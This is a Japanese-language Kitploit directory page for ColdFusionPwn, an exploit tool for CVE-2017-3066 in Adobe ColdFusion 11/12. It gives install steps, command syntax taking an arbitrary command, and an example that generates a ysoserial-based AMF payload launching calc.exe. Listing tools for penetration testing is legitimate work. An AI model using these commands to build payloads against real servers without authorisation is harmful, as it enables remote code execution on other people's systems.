Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/codewhitesec/coldfusionpwn
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト
GitHubcodewhitesec/coldfusionpwn

ColdFusionPwn

Adobe Coldfusion 11/12 を標的とした CVE-2017-3066 用エクスプロイトツール

リポジトリを見る
95293年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

ColdFusionPwn

CVE-2017-3066 を標的とした Adobe Coldfusion 11/12 向けエクスプロイトツール。

説明

このツールは、許可されたクラスの入力検証が欠如していることを悪用するための、シリアライズ化された AMF ペイロードを生成できます。 詳細はブログ記事を参照してください。

インストール

最新版の ysoserial を入手してください。 releases から ColdFusionPwn を入手してください。

使用方法

root@kitploit:~
java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-master-SNAPSHOT.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner [-s|-e] [payload type] '[command]' [outfile]
root@kitploit:~
- [-s|-e]         Setter (CF11) または Externalizable エクスプロイト (CF11/12) の手法
- [payload type]  ysoserial ガジェットペイロード
- [command]       実行するコマンド
- [outfile]       生成されたペイロードの出力ファイル

ysoserial に同梱されている ApacheCommons BeanUtils ライブラリは新しいバージョン (かつ異なる serialversion uid を持つ) ため、クラスパスの先頭に ColdFusionPwn-0.0.1-SNAPSHOT-all.jar を配置する必要があります。

例

root@kitploit:~
java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-master-SNAPSHOT.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 calc.exe /tmp/out.amf
ツールをダウンロード